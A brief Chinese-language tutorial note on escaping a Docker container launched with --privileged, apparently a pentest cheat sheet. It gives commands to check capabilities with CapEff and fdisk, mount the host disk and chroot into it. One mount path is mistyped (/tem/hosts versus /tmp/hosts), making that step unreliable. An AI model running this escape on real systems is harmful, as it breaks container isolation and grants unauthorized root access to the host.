特权模式逃逸
当容器启动加上–privileged 选项时,容器可以访问宿主机上所有设备
启动一个特权容器
sudo docker run --rm --privileged -it ubuntu:18.04 bash
判断容器是否特权启动
查看磁盘,默认情况下容器执行fdisk -l 是无法查看的
fdisk -l
查看 capEff 值,特权值为 0000003fffffffff
cat /proc/self/status | grep CapEff
#创建一个挂载目录
mkdir /tmp/hosts
#查看宿主机磁盘文件
fdisk -l
#挂载到创建的目录
mount /dev/sda1 /tem/hosts/
cd /tmp/hosts/
#通过 chroot 切换 bash
chroot ./ bash
